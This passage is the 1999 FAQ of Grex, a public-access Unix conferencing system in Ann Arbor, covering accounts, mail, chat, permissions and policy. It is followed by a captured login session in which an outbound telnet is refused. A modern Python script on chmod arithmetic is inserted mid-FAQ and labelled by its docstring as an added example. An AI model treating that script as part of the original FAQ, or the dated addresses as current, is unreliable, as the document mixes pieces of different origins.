    o Access web sites running on unusual ports, via lynx from Grex.

* What operating system is Grex running?

  Grex is running SunOS 4.1.4 on a Sun 4/670 MP with dual processors. It is
  not Linux, but it is Unix, so in many ways it is similar to Linux. There
  are a lot of details about Grex's configuration available in the Grex
  staff notes on the web: http://www.cyberspace.org/staffnote/ Follow the
  link to Grex's Hardware and software.

----------------------------------------------------------------------------

Conferencing

* What is "computer conferencing?"

  A computer conference is an area set aside for discussion on some general
  topic, such as computers, politics, or gardening. In such an area, people
  can read what other people have posted, and can introduce new subtopics
  or add responses to existing ones. On many systems, conferences are
  called "forums". Grex has many conferences. For a complete list, see
  http://cyberspace.org/cgi-bin/bt/pistachio/conflist.

* How can I participate in Grex's conferences?

  Grex's conferences are accessible by a text-based terminal interface or
  by the World Wide Web.
  To access the text-based interface, either dial direct or telnet to Grex
  and run the "bbs" command. (This command is run automatically every time
  you log in if you choose the "bbs shell" when you create your account.)

  World Wide Web access is provided by Grex's "Backtalk" conferencing
  software. Please see http://cyberspace.org/backtalk.html for details on
  using Backtalk.

----------------------------------------------------------------------------

Governance

* How is Grex governed?

  Cyberspace Communications functions as an online democracy, with policies
  set by its users. The Co-op Conference is open to all users and provides
  a forum for discussing policy issues. The Board of Directors, elected by
  the members, is the formal governing body and uses consensus in the Co-op
  Conference as its primary guide for making decisions. Any member of Grex
  who can attend the monthly meetings, held in Ann Arbor, Michigan, is
  eligible to run for the Board of Directors. In addition, any member can
  call a binding vote by the membership on any policy issue. The Articles
  of Incorporation and Bylaws can be viewed online.

* How can I participate in Grex governance?

  Any user can have a voice in Grex governance by joining the Co-op
  conference and participating in the discussions there. If you wish to be
  eligible to vote in Grex elections and to run for the Board of Directors,
  you can become a Grex member. Membership dues are US$6/month or
  US$60/year. To find out how to make membership payments, please see
  http://cyberspace.org/member.html. Membership donations are Grex's
  primary source of financing.

* Can I pay for membership by credit card?

  Unfortunately, no. Grex has investigated the possibility of accepting
  memberships by credit card, but the setup cost and monthly charges that
  we would have to pay to the bank are too high for us to pay. We do accept
  personal checks in US funds drawn on a US bank, US currency (not
  recommended to send by mail), and international money orders.
----------------------------------------------------------------------------

How do I ... ?

* How do I change my name, my shell, my mail forwarding, my password, or my
  terminal type?

  You can change any of these properties of your account with the "change"
  command. If you are using a menu or if you are at a bbs (Ok) prompt, type
  "!change". If you are in lynx, type "!" (an exclamation point) to get to
  a shell prompt first. At a shell prompt, type "change" and follow the
  menu-based instructions.

* How do I change my login ID?

  You can't change it. Instead, you have to create a new account with the
  login ID that you wish. Once you have done that, you can copy the files
  that you need from your old account to your new one. When you no longer
  need your old account, you can ask to have it deleted by sending a
  request from your old account to staff@cyberspace.org.

* How do I set up a web page?

  There is a completely separate FAQ for all questions related to the Grex
  web server. Please see http://www.cyberspace.org/local/grex/wwwfaq.html.

* How do I run irc?

  Unless you are a paying member, you can't use IRC because the protocol is
  blocked for free accounts. For more detailed information about this, see
  the Grex Eggdrop Page from the Grex Staff Notes. If you are a guest user,
  you cannot access IRC. You can chat on-line within the Grex community by
  using "party" (see chatting, below). Paying members just need to type
  "irc" to run the ircii client program, which is installed for this
  purpose.

* How do I chat with others?

  Grex has six ways of chatting:

    o 'party' is a chat program that many people can run at once.
    o 'write' sends text to the other person's screen one line at a time.
    o 'chat' is like 'write' but it sends one character at a time.
    o 'tel' is like 'write' but it sends only one line and then stops.
    o 'talk' splits the screen in half, so both people can type at once.
    o 'ytalk' is like talk but can accommodate more than two people.
* How do I find out who is waiting to log in?

  You can't find which accounts are waiting. People don't log in until
  after they get out of the telnet queue, so the system doesn't actually
  know who the people in the queue are. You can get some amount of
  information about who is in the queue. The command:

    fixwait -l

  will give you a list of the IP addresses that people on Grex are coming
  from, including people in the queue. If your friend has a unique IP
  address, you may be able to recognize it in the list.

* How do I get out of vi?

  vi (pronounced vee-eye) is a powerful text editor, but it has a steep
  learning curve at first. You can usually tell that you are in vi when you
  have a vertical line of squiggles (tildes) on the left of your screen. If
  you are trapped in vi, remember to type the escape key and then :q!
  (colon-q-exclamation point) followed by a return. The pico editor is a
  much friendlier editor for less experienced users.

* How do I access Usenet news?

  Grex does not maintain its own base of Usenet news, because this requires
  too much space and too much of our internet link. So there is no usenet
  client program on Grex. However, you can access Usenet via the "lynx" web
  browser. Just connect to http://dejanews.com/.

* How do I run X-windows?

  Grex does not support graphical interfaces such as X-windows. This
  service requires many more resources than the text-based service that
  Grex provides. It would use far too much CPU time and bandwidth for Grex
  to be able to support it.

* How do I restore a lost file from a backup tape?

  We can't do that. We just don't have time. Grex makes regular backups
  onto tape, but this is an enormously time consuming process. The purpose
  of these backup tapes is to protect the system from disaster.
  Unfortunately, there is not enough time to honor requests from individual
  users to restore files from these tapes. Grex is not a good place to keep
  any file that you cannot afford to lose. If you have an important file on
  Grex, it is your responsibility to keep a backup of it on your own
  computer.

* How do I get a list of Unix commands?

  There are so many Unix commands that we recommend that users who are not
  familiar with Unix use the "menu" command to explore Grex. The most
  common commands are available there. If you really want a list, then run
  the Grex command "listcommands" to print a list of most Unix commands on
  Grex. (Built-in shell commands are not included.) This will take a long
  time to run.

* How do I use Unix commands?

  The Unix operating system is amazingly powerful and flexible, with
  thousands of commands. Unix can be a challenge to get started with, but
  if you are interested in learning Unix, Grex is a good place to start,
  since we do give you access to almost all commands. For a good
  introduction to basic Unix and VI usage, see Christopher Taylor's witty
  tutorial Unix is a Four Letter Word, or the University of Edinburgh's
  UNIXhelp for Users pages. Jennifer Myers has a good page of Unix links at
  the UNIX Reference Desk. Online reference information about most commands
  can be called up via the "man" command. For example, for information
  about the date command, type

    man date

----------------------------------------------------------------------------

Accounts and Passwords

* Why do numbers appear before the login prompt?

  If you are telnetting to Grex when it is full, you must wait in a queue
  for a free port to telnet into. These numbers are telling you your place
  in line. There usually is no queue in the evenings in the eastern US and
  on weekends.

* Why do I get a login prompt after I log out?

  This is in case there is a queue. It permits you to log in without
  waiting through the queue a second time. It is safe to disconnect when
  you are at the login prompt, or you can type "bye" or "exit" and Grex
  will disconnect.

* Why does it say my new password is too obvious?

  Probably because it is too short, or only has lower case letters.
  It is important that internet vandals not be able to guess your password.
  Therefore, the Grex password change program is very particular about what
  it will accept. It is a good idea for your password to have at least 9
  characters, at least one of which is an upper case letter, and at least
  one number or punctuation character embedded in it. Try the "genpass"
  program for some random passwords.

* Why does it say my password is expiring?

  For security reasons, you should not keep the same password for too long.
  Grex passwords expire when they have not been changed for a whole year.
  All you have to do is run the "change" program to change your password,
  and you will stop getting nagged when you log in. Please remember to
  write your new password down when you change it, so you won't forget it.

* Grex said, "3 failures since last login," when I logged in. What does
  this mean?

  When someone tries to log in to your account but does not know the
  password, Grex keeps count of failed login attempts. In general if there
  are only two or three of them, it probably means someone made a typo at
  the login prompt. This happens most often for accounts with very short
  user IDs and those with popular names, such as "ken". Less commonly,
  login failures may occur when someone runs telnet with the option to pass
  along the account name from another system. If it is a different account
  name, but matches yours, this will produce a failed login attempt for
  your account every time this person telnets to Grex. If there are 25 or
  30 failed login attempts, or if the last successful login to your account
  wasn't yours, then it could mean that someone is trying to break in to
  your account. In general, most failed login attempts are from other
  people's typing errors and are not malicious. If you still suspect
  malicious activity, change your password (don't forget to write it down)
  and let the staff know so that they can investigate.

* I can't remember my password. What do I do?

  Contact the Grex staff. Send mail from another site if you have access to
  email at another site. Send messages about access problems to
  staff@cyberspace.org. Remember to specify which account is the one you
  lost the password for. You can also log in to Grex as "trouble" without a
  password, which will send a message to the staff. Be sure to provide a
  postal address, an e-mail address, or a local telephone number, so that
  the staff can contact you in return.

* I have a Grex account. Why do I get "No such loginid?"

  This means that your account has been deleted. Accounts on Grex are
  deleted if no one logs in for more than 3 months. There is not enough
  room on Grex to keep old unused accounts. To avoid losing your account,
  you should log in every month or two. Accessing your web page, or having
  your mail get forwarded does not count, but conferencing over the web
  using your account and password in Backtalk does count as logging in for
  this purpose. If your account has been deleted, it usually cannot be
  recovered or restored. Please feel free to recreate the account.

* I don't want to use my account anymore. How do I get it deleted?

  If you don't want to wait until your account expires, you have to log in
  one last time and send a message to staff@cyberspace.org from the account
  that you want deleted. In your message, ask for it to be deleted.

* Why can't I enter control-C when I am creating my account?

  When creating an account by telnet, you are asked to provide the
  characters you wish to use for various purposes. People using Macintosh
  NCSA Telnet have experienced the behavior that when they type ^C, the
  program exits rather than accepting the ^C as the designated control
  character. This is caused by undesirable preferences within that program
  and is easy to fix. Look at the "Session" menu, at the "Setup Keys" menu
  item (or hit command-S). You will probably find that you have a setting
  for "interrupt process" which is set to ^C.
  If so, NCSA Telnet is honoring this setting and sending the "interrupt
  process" signal (part of the time-worn telnet protocol) whenever you type
  ^C. Blank this setting out and then save your telnet set in a file. If
  you start telnetting by double clicking on the saved settings, you won't
  have to remember to clear it each time.

----------------------------------------------------------------------------

E-Mail

* How do I get Grex to forward my mail to another site?

  Use the "change" command. Just type "change" at a shell prompt or
  "!change" at any other prompt. This will invoke a menu that allows you to
  change almost any setting on your account, including the mail forwarding
  option. There are certain restrictions on the use of forwarding, so make
  sure you are following the rules.

* I set up .forward myself. Why doesn't it work?

  Probably because it is not world readable. .forward files must be world
  readable in order to be valid on Grex. If you are looking for a way to
  forward your mail to an anonymous place, you need to find an anonymous
  remailer system. Grex doesn't do this. To make your .forward file world
  readable, change to your home directory (type: cd) and then issue this
  command:

    chmod 644 .forward

  Your home directory must also be world accessible; type:

    chmod 755 .

  or use 711 instead of 755 if you don't want other people to be able to
  scan your directory.

* How can I hide my forwarding address?

  You can't. If you have forwarding enabled, the address must appear in the
  finger command. There is no way to hide the address that you are
  forwarding to. Grex does not wish to provide anonymous remailing
  services. You may wish to make use of one of the anonymous remailers
  listed on the Yahoo page
  http://dir.yahoo.com/Computers_and_Internet/Security_and_Encryption/Anonymous_Mailers/.

* How do I read mail with Netscape or Eudora?

  You can't. Those are POP clients, and Grex doesn't run a POP server. This
  is because Grex is intended to be an on-line community, and having a POP
  server would encourage people to use Grex as a mail drop instead, never
  logging on, and so never having a chance to become part of the Grex
  community. You must log in to Grex in order to read your mail.

* My mailbox is getting heavily spammed. What can I do?

  Spam (unwanted mail) is unfortunately very common on the internet. Grex's
  mail transport system has numerous filters to reduce spam, but it does
  not eliminate it. The Grex staff may or may not be able to help you
  reduce the spam you are getting. The proper way to report spam is to
  forward a copy of one of the offending messages to abuse@cyberspace.org.
  Do not send multiple messages. The message you send MUST be accompanied
  by the full mail headers, so that we can determine its true origin. The
  origin of spam is often hidden, and may require detailed examination of
  these headers. If you use pine, you can view these headers with the "H"
  command.

* Why is mail that I send to Grex getting rejected?

  This usually happens when the sending site is not configured properly.
  Problems in mail configuration can often lead to mail that has an invalid
  return address. Grex's mail system tries very hard to detect and reject
  invalid sending addresses, in order to reduce the amount of spam
  (unwanted mail) on Grex. If your mail looks like spam, then Grex will
  reject it. If you think this is happening to your legitimate mail, send a
  rejected copy of it to grex-staff@pmtech.com, and be sure to include all
  of the mail headers. Other common reasons for mail to Grex to be rejected
  are that it may be too large (over 100k) or your mailbox may have grown
  too large (over 600k). Mail will be rejected in these cases.

* Why does pine say that it cannot open my mail folder?

  Actually, that is probably just a faulty error message. For new accounts,
  it only means that you haven't received any mail yet. Once you receive
  some mail, the message should go away forever.
  We are working on getting rid of this error message.

* How do I get pine to save my outgoing mail?

  This feature is turned off on Grex by default, because lots of new users
  were accumulating vast files of old mail without ever knowing that they
  were doing it. You're quite welcome to create the folder, as long as you
  keep an eye on your disk usage so that you don't exceed Grex's 1 megabyte
  limit for your account. To create your saved-mail folder, go into the
  pine configuration screen and look for the setting for "default-fcc". Set
  it to "saved-mail" or whatever name you would like to use. You need to
  use quotation marks around the file name.

* How do I send attachments?

  Please do not send large attachments. If you have a small one, so that
  your mail remains under 100 K bytes in size, then you can send
  attachments from Grex. Once the file is in your home directory on Grex,
  then when composing a message in pine, put the file name on the
  attachments line. Please remember to delete the file after sending it as
  an attachment, so that you do not fill up your allotted disk space.

* How can I view an attachment file named myfile.doc?

  Any file that ends with ".doc" is probably a Microsoft Word file. There
  is no way to view such a file on Grex. You will have to download that
  file to a computer that has Microsoft Word or some other word processor
  that can import such files.

* How can I set the "From" header in pine for my outgoing mail?

  In Pine on Grex, you can't set the "From:" field. This is disabled
  because there were too many problems with people setting invalid
  addresses, which caused their outgoing mail to bounce to the postmaster
  whenever it was undeliverable.

* How do I set up a mailing list here?

  You can't. We're sorry, but this is not permitted. You can only forward
  mail to a single site elsewhere on the internet. Mailing lists are too
  resource intensive for Grex to support. You may wish to try using an
  advertising-based free mailing list service. The Free Center maintains a
  rated list of free mailing list providers.

* Is it OK to collect my mail by FTP?

  Yes, but you must do it correctly. It is extremely risky to attempt to
  transfer your mail spool file directly off of Grex by FTP. You risk
  losing some or all of your collected mail, because the FTP daemon does
  not participate in the locking scheme used by the mail delivery programs
  on Grex. In addition, your account may appear to be abandoned because FTP
  connections do not update the date of last login. This could result in
  loss of your account if it is the only way you use Grex. Instead, we
  recommend telnetting to Grex and running a mail client program. These all
  do participate in the locking mechanism for the mail spool. Collect all
  of your mail into a file in your home directory, and then log out. You
  may now safely fetch that file in your home directory by FTP. Please
  remember to delete it once it has been safely transferred.

* Why can't I get procmail to work?

  Procmail is a mail filtering program, but it stopped working when Grex
  reorganized its mail system to use hierarchical mail directories. Grex
  really needs to have the mail organized hierarchically because of the
  very large number of users receiving mail. We hope to see procmail
  restored some day, but at the moment it is broken, and no schedule has
  been established for correcting it.

* Can I set up an autoresponder to answer my mail while I am away for a
  while?

  Yes. Try the vacation program. The instructions can be found by typing
  "man vacation".

----------------------------------------------------------------------------

Dialing In

* How can I dial into Grex?

  The short answer is to dial (734) 761-3000 with your terminal software
  set to 8-N-1. This process is described in detail in Grex's dial-up
  access information page.

* If Grex doesn't answer the phone, how many times should I let it ring?

  We try very hard to keep all of the modems working properly, but
  sometimes, you may encounter a failure.
Grex's phone lines are all configured so that if one modem doesn't answer after 3 rings, you are automatically transferred to the next line in the trunk hunt. If there happens to be a stuck modem, you need to wait at least 4 rings before a second one gets a chance to work. If there are two bad modems, then 7 rings are required. * If I can't get on by calling (734) 761-3000, is there another number I can try? No. Grex used to publicize other numbers in the interior of the hunt group, but there is no longer any advantage to calling any other number, because of this automatic stepping feature. Even if Grex is down, the phone should pick up once it steps past any bad modems. If it is down for an extended period, you should receive a short explanation from the terminal server. If the terminal server has failed, or the power to Grex's building has failed, the phones will not answer, but these conditions are very rare. * Why can't I get file transfer to work except for small files? Probably because you don't have a modem cable that is capable of handling hardware flow control, or your modem doesn't support it or has the feature turned off. ---------------------------------------------------------------------------- Privacy, Encryption, and Security * My personal information should be private. Why is it shown? When you look up your own user information, you can always see it, even if it is set up so that nobody else on the system can see it. To see what other people see, ask for the info about "youraccount@cyberspace.org" instead of just "youraccount". * How can I keep private the place I'm logged on from? This is considered public information on Grex. The only way to hide it is not to log on. * I am receiving unwanted chat requests. What can I do? You can adjust the chat settings for your account with the "change" command. To run it, type "change" at a shell prompt, or "!change" from a menu or from PicoSpan. Then choose "W) Write settings" and follow the menus from there. 
  You can: turn off all chat requests, accept all chat requests, or select which users can and cannot chat with you.

* How can I view my friend's files?

  Grex is a very open system, so directories are open to the public unless the owner decides to make them private. E-mail, however, is automatically saved in private files that the world cannot see.

  To permit a file so that it can be seen by others, type

      chmod a+r file-name

  To permit a directory, type

      chmod a+rx dir-name

  To hide a file or directory from everyone but yourself, type

      chmod go-rx file-or-dir-name

  If you hide your home directory completely, neither mail forwarding nor web hosting will be available to you. You may make your directory accessible without allowing it to be scanned. This is how:

      chmod 711 dir-name

* Can I run PGP on Grex to protect my e-mail messages from being seen by others?

  No. PGP is not available on Grex for a number of reasons. The two most compelling reasons are that it would not be legal, and it would not offer you the protection you seek. We would like to see it be legally available to all, but in order to be effective, PGP must be installed on your own computer, not on Grex. Encrypting or decrypting a message on Grex would mean that the message would have to travel over an insecure network in plaintext before encryption or after decryption, and this is not the way to protect your message.

  In order to install PGP on your home computer, North American users should go to the MIT PGP Distribution Site at http://web.mit.edu/network/pgp.html, and all other users should use the international PGP home page at http://www.ifi.uio.no/pgp/.

* Do you provide secure shell?

  Yes, we do. Secure shell (ssh) is a good way to connect because your session is encrypted, so that passwords cannot be intercepted by sniffers. Unfortunately, it is not fully functional on Grex, because the ssh daemon is unable to wait in line with telnet users when there is a queue, so ssh connections will fail when the system is full.
  You may see a message like this when it fails:

      Warning: no access to tty (Bad file number).

  When there is no queue you can use ssh to connect to Grex without any trouble.

----------------------------------------------------------------------------

Programming

* How do I compile a program?

  To compile a C program named foo.c, type

      gcc foo.c -o foo

  This compiles foo.c and creates an executable program named foo. To run it, type

      ./foo

  Likewise, to compile a C++ program named foo.cpp, type

      g++ foo.cpp -o foo

  Please check with the Grex staff before compiling programs you bring in from the net. Most of the useful programs are already installed here, and many others will not run on Grex, but compiling them on Grex wastes a lot of bandwidth and cpu time — resources that Grex is short on.

* Why can't I get the C compiler to compile my program?

  Probably you are using the wrong C compiler. Grex has two compilers installed. cc is only used for building certain system executables. It is not ANSI standard, and it lacks certain standard include files. You need to use gcc instead. This is a fairly recent version of the Gnu C compiler. It is ANSI standard and very complete.

* I compiled my program. Why won't the system run it?

  Usually this is because the program is not on your path. Unlike a DOS or Windows system, on Unix the current directory is not automatically placed on your path. So if you compile a program named foo, you cannot run it by just typing "foo". You need either to place the executable somewhere on your path, or to precede its name with ./ (dot-slash), so you would type "./foo".

* Can I install a "Bot"? Talker? Ircd? Mud? Mush? Muck? Moo?

  No. These are all servers, daemons, or programs that remain running after you have logged out. No program run by users is allowed to run after you log out. See the Grex Eggdrop Page from the Grex Staff Notes.
  At one time or another, the possibility of our installing some of these as official services has been discussed in the "coop" conference. We have never yet decided to do so, but if you are interested in pursuing this possibility, the Grex coop conference is the place to make your request.

* Can I have a copy of Grex's newuser program?

  Yes, you can find out more about newuser, including availability, on this web page: http://www.cyberspace.org/~mdw/newuser.html.

* Can I have a copy of Grex's write/chat/tel programs?

  Yes, you can find out more about write/chat/tel, including availability, on this web page: http://www.wwnet.net/~janc/write.html.

* Can I have a copy of Grex's party program?

  Yes, you can find out more about party, including availability, on this web page: http://www.wwnet.net/~janc/software.html.

----------------------------------------------------------------------------

Miscellaneous

* Why does my browser say "Can't find application" when I click on the "Telnet In" link?

  You need to configure your browser to find your telnet application program. The exact instructions for doing this vary widely depending upon both your operating system and your browser. In Netscape 3 this setting can be found in "Options"/"General preferences"/"Applications". Select the telnet application that came with your system, or one you downloaded from the internet. For more details about telnet applications, see the Grex Telnet Information page at http://www.cyberspace.org/telnet.html.

* When I try to telnet to Grex, it hangs. Why can't I connect?

  There are several things that can go wrong.

  o You don't have DNS working properly. In this case you can connect to Grex by using its IP address. See below.

  o You are accessing the net via a firewall which blocks telnet. In this case you need to contact your security administrator for the LAN which you are accessing the net from, and ask if there is a way to telnet through the firewall.

  o Your telnet client is not working properly.
    You would not be able to telnet to any other site, either. Have you tried any? Try telnetting to hvcn.org and see if you get a login prompt.

  o Grex is down. This happens occasionally. You can usually tell if Grex is down by trying to access the web site. Try reloading to eliminate the possibility of a cached page. This won't be a good test if your connection uses a caching proxy server.

  o If it is none of the above, send mail to The Grex Staff and explain everything you tried, and also please specify the IP address and the GMT time that your attempt failed. If you can provide the results of a ping or traceroute from your end, that may prove to be helpful, too.

* Can I do a ping or traceroute from Grex?

  These tools are not available on Grex. Vandals were using them to attack other sites. This is a ludicrous thing to do from Grex, because Grex is so tiny that its CPU and net connection become overloaded long before any other system would even begin to notice that it was being attacked. But people were doing it anyway, and hurting Grex. Regrettably, the actions of a few thoughtless people have forced Grex to disable these potentially valuable network analysis tools. You may be able to use a remote traceroute server on the web. See http://www.traceroute.org/.

* What is Grex's IP address?

  At the time this answer was last updated, the IP address of Grex was 204.212.46.130. IP addresses may change at any time, and in general we have little control over changes to our IP address. You should always use the hostname, because if the IP address does change, the DNS (Domain Name Service) lookup of the hostname should produce the new IP address. If you are unsure whether a problem is due to DNS, you can test to see if you can connect using our IP address. However, if you can, it is strongly recommended that you resolve the problem you are having with DNS, so that you do not have to rely on inherently unreliable IP addresses.
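The chmod commands from the "How can I view my friend's files?" answer in the Privacy section above, worked through as pure mode arithmetic. This is an added example, not Grex's own code or part of the FAQ; it touches no files, and the default mode of 755 it starts from is an assumption.

```python
"""Permission arithmetic for the chmod commands in the Grex FAQ.

Added example, not Grex's own code. It never touches the filesystem: it
models what `chmod a+r`, `chmod a+rx`, `chmod go-rx` and `chmod 711` do to
the rwx bits and what each result leaves visible to other users of a
shared system such as Grex.
"""

# Shift of each class's rwx triplet inside the mode: user, group, other.
WHO_SHIFT = {"u": 6, "g": 3, "o": 0}
PERM_BIT = {"r": 4, "w": 2, "x": 1}


def apply_chmod(spec: str, mode: int) -> int:
    """Return the mode that `chmod <spec>` would leave on a file with `mode`.

    Handles the two forms the FAQ uses: absolute octal ("711") and symbolic
    clauses ("a+r", "go-rx", "u=rwx,go=x"). Only the rwx bits are modelled;
    setuid, setgid and sticky bits pass through unchanged. A clause with no
    class letters is treated as "a" (real chmod would also apply the umask).
    """
    if spec.isdigit():
        return (mode & ~0o777) | (int(spec, 8) & 0o777)
    for clause in spec.split(","):
        i = 0
        while i < len(clause) and clause[i] in "ugoa":
            i += 1
        who = clause[:i] or "a"
        if i >= len(clause) or clause[i] not in "+-=":
            raise ValueError(f"bad chmod clause: {clause!r}")
        op, perms = clause[i], set(clause[i + 1:])
        if not perms <= set(PERM_BIT):
            raise ValueError(f"bad permission letters in: {clause!r}")
        bits = sum(PERM_BIT[p] for p in perms)
        for cls in ("ugo" if "a" in who else who):
            shift = WHO_SHIFT[cls]
            if op == "+":
                mode |= bits << shift
            elif op == "-":
                mode &= ~(bits << shift)
            else:  # "=" replaces the whole triplet for that class
                mode = (mode & ~(7 << shift)) | (bits << shift)
    return mode


def ls_style(mode: int) -> str:
    """Render the rwx bits the way `ls -l` does, e.g. 0o711 -> 'rwx--x--x'."""
    return "".join(
        ("r" if (mode >> s) & 4 else "-")
        + ("w" if (mode >> s) & 2 else "-")
        + ("x" if (mode >> s) & 1 else "-")
        for s in (6, 3, 0)
    )


def home_dir_exposure(mode: int) -> str:
    """Classify a home directory mode in the FAQ's own terms.

    Other users need 'x' on a directory to traverse it (mail forwarding and
    web hosting both depend on that) and 'r' as well before they can list it.
    """
    other = mode & 0o7
    if not other & 1:
        return "hidden: neither mail forwarding nor web hosting will work"
    if not other & 4:
        return "traversable but not listable (the FAQ's chmod 711 case)"
    if other & 2:
        return "world-writable: anyone can add or remove entries"
    return "publicly listable"


if __name__ == "__main__":
    # Walk the FAQ's commands starting from an assumed default of 755.
    mode = 0o755
    for cmd in ("go-rx", "a+rx", "711", "a+r"):
        mode = apply_chmod(cmd, mode)
        print(f"chmod {cmd:<6} -> {oct(mode)} {ls_style(mode)}  {home_dir_exposure(mode)}")
```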
* Why does the "who" command show numeric IP addresses for some users?

  That is because this information is stored in a file (utmp) which only permits 16 characters of storage for it. If the address, converted to a host name, exceeds 16 characters, then it is stored (and reported) only in its numeric form. This affects other commands besides the "who" command, such as the "finger" and "last" commands.

* How much disk space can I use and how can I determine how much I am using?

  We ask folks to keep their disk usage under a megabyte. You can find out how much disk space you are using (in kilobytes) by running the following command in your home directory:

      du -sk

  The number that comes back is the number of kilobytes of disk you are using. If you are using more than 1024, please remove files. If you are thinking of putting something big in your account, please talk to the Grex staff (staff@cyberspace.org) first. There aren't many good reasons to put big things in your Grex account: Grex doesn't allow multimedia files on its web pages (not even gifs and jpegs), and most of the useful programs that will actually run on Grex are already installed on Grex. So please talk to the staff first.

* Why doesn't my arrow key work, so I can edit previous commands in sh?

  This is because Grex is running a real sh, and command-line editing is a feature not supported by sh. What some Unix systems call sh is actually bash, an enhanced version of the sh shell which does this. If you would like to use bash instead, you should change your shell on Grex to bash. You can do that by running the change command.

* Why can't I edit previous commands in tcsh? It is supposed to support it.

  Tcsh does support previous line editing. Emacs conventions for command-line editing are the default at most sites, though Grex uses vi as the default for command-line editing.
  So you have two options: If you are handy with vi, hit escape to jump into command mode, then start editing your line as you would with vi. The second option is to type

      set -o emacs

  at the prompt. After that, you should be able to edit your command line in a way that is familiar to you. If you prefer to always use emacs as your command-line editor, then you'll want to place the "set -o emacs" line in your .login file.

* Why does the last line of each page of text disappear from the screen before I can read it?

  This happens when Grex doesn't know how many rows of text are on your screen. The easiest way to set this correctly is to run the "change" program on Grex. It will count rows for you and display the correct number at the top of your screen (sometimes it can take some fiddling to figure out whether your screen has 48 or 49 or 50 rows), and make the necessary changes to your startup files so that your settings will be right in the future. To run the change program, type "change" at a shell prompt, or "!change" from a menu or PicoSpan. Then select "change terminal type" and follow the menus from there.

* Why do the bottom lines stay on the screen in the editor while the rest scroll normally?

  Same problem. Wrong number of lines in the setting. See solution above.

* Why doesn't "screen" work when I disconnect from Grex?

  Grex runs a special daemon that kills all user processes when a user logs out. This prevents users from running servers or robots of any kind. It also prevents them from using the reconnect feature of screen (although the other features work fine). The reason for this policy is to prevent users from consuming our limited resources while not logged in.

* I found a huge core file in my account. What should I do?

  Nothing really. This is a file that gets created if a program fails (crashes). It is intended to help the programmer find whatever bug caused the failure. If not renamed, these files will be deleted automatically in a day or two.
  You can delete it if you wish. By the way, a core file usually doesn't take up as much space on the disk as it appears to, because it is "sparse" (full of empty space).

* How does the system decide where to put my home directory?

  Grex uses a hierarchical arrangement of home directories to keep the directory sizes from growing too large and thus becoming inefficient. So, on Grex, home directories are always located by a path of this form:

      /x/y/z/username

  The x is the disk letter, the y is the first letter of the username, and the z is the second letter of the username. Currently we have two disks that user accounts occupy, /a and /c (/b was not available). When we add a third disk, some users will be assigned on /d. The choice of disk is determined when your account is created, and this choice is switched back and forth manually by the staff to keep the available disk space balanced.

  The environment variable $HOME should always be set to the full path of your home directory. The ~ symbol may also be used as a shorthand for your home directory, as long as your shell supports it. (The Bourne Shell does not.)

* Where can I get a self-contained multi-user chat program for my linux box?

  You might want to try out Grex's party program. See the Party Question in this FAQ.

* I know something about Unix. How can I help the Grex staff?

  We are always delighted to have new volunteers. One of the things that Grex needs most urgently is more people to answer "write help" requests. It is recommended that you check out the helpers conference. To turn on your helper flag, run the Unix command "mesg -h y". Also you should read the Grex Staff Note on the topic of volunteering to be on the Grex staff.

----------------------------------------------------------------------------

Last updated January 17, 1999 (srw)


> telnet 24.112.43.46

Sorry!
You need to be a *validated member* of Grex to use outbound internet services, including ftp and telnet, to connect to anything other than Grex itself.

To find out how to become a *member*, type "support" (without the quotes) at almost any prompt, or !support at the telnet or ftp prompt.

To become a *validated* member, either pay for your membership with a personal check, or include a photocopy of a driver's license or other official ID along with your membership payment, or send mail to aruba (Grex's treasurer) to work out some other way of identifying yourself.

Membership costs $6/month - cheap!

Grex has lots of options that are available to non-members. Try typing "bbs" to join the conferences, or "menu" or "lynx" for two different menu systems that help you to find many options that you *can* use.

If you have questions about Grex, you can find answers by joining the Info conference. (Type "bbs info" to get there). Or send mail to "staff".

Thanks for trying out Grex!

Trying 24.112.43.46 ...
telnet: connect: Permission denied
/usr/local/grex-scripts/.inet_real/telnet> exit
?Invalid command
/usr/local/grex-scripts/.inet_real/telnet> ls
?Invalid command
/usr/local/grex-scripts/.inet_real/telnet> open
(to) 244^H^H
2: unknown host
/usr/local/grex-scripts/.inet_real/telnet> open
(to) 244.1^H^H^H^H
2: unknown host
/usr/local/grex-scripts/.inet_real/telnet> p
?Invalid command
/usr/local/grex-scripts/.inet_real/telnet> open
(to) 24.112.43.46
Trying 24.112.43.46 ...
telnet: connect: Permission denied
/usr/local/grex-scripts/.inet_real/telnet> close
?Need to be connected first.
/usr/local/grex-scripts/.inet_real/telnet> quit
> exit
logout

Grex central timekeeping. At the beep, the time is 6:26PM on Tuesday, 19 October 1999

New to grex? Type help at the login prompt

Grex central timekeeping. At the beep, the time is 6:20PM on Tuesday, 19 October 1999

New to grex?
Type help at the login prompt (ttys3)

grex login: ccc
ccc's Password:

Thanks to the Ann Arbor Observer for the long-running Grex ad on arborweb.com.

Happy Birthday to Jishnu Nair (atticus's baby)!

Last login: Tue Oct 19 18:13:31 on ttyu8 from 24.112.43.46
No mail.

Type 'bbs' to see what Grex is all about!
Type 'change' to change your settings.
Type 'faq' to see answers to frequently asked questions.

> ls -laFF
total 10
drwxr-xr-x   2 ccc   populus   512 Oct 19 18:14 ./
drwxr-xr-x  16 root  wheel     512 Oct 19 18:13 ../
-rw-r--r--   1 ccc   populus  1159 Oct 19 18:15 .agora31.cf
-rw-r--r--   1 ccc   populus   778 Oct 19 18:13 .cfonce
-rw-r--r--   1 ccc   populus   664 Oct 19 18:13 .cshrc
-rw-r--r--   1 ccc   populus   718 Oct 19 18:13 .login
-rw-r--r--   1 ccc   populus  1245 Oct 19 18:13 .mailrc
-rw-------   1 ccc   populus   360 Oct 19 18:13 .plan
> ps -aux
USER       PID %CPU %MEM   SZ  RSS TT STAT START  TIME COMMAND
> faq

Frequently Asked Questions About Grex

General

* What is Grex?

  Grex is a public-access computer conferencing system in Ann Arbor, Michigan, USA. It is cooperatively owned and operated, and is supported entirely by donations from users. All staff members are volunteers.

* What does the name "Grex" mean?

  Grex is not an acronym. It is a Latin word meaning "flock". It is the root of a number of familiar English words such as aggregate, congregate, and gregarious.

* What can I do on this system?

  Grex provides all of the following services for free.
  o Electronic conferencing using "PicoSpan" or "Backtalk"
  o Internet e-mail using "mail", "elm", "pine" or "mh"
  o Browse the web in text mode using "lynx"
  o Access to usenet via "lynx" to the dejanews web site
  o Multichannel real-time chat using "party"
  o Free text-only web site hosting.
  o On-line games, including "Nethack"
  o Access to a Unix shell account, with all standard commands
  o Access to the C/C++ compiler, assembler, and other development tools

  However, Grex does not provide any of the following services at all:

  o Download areas
  o Mailing lists
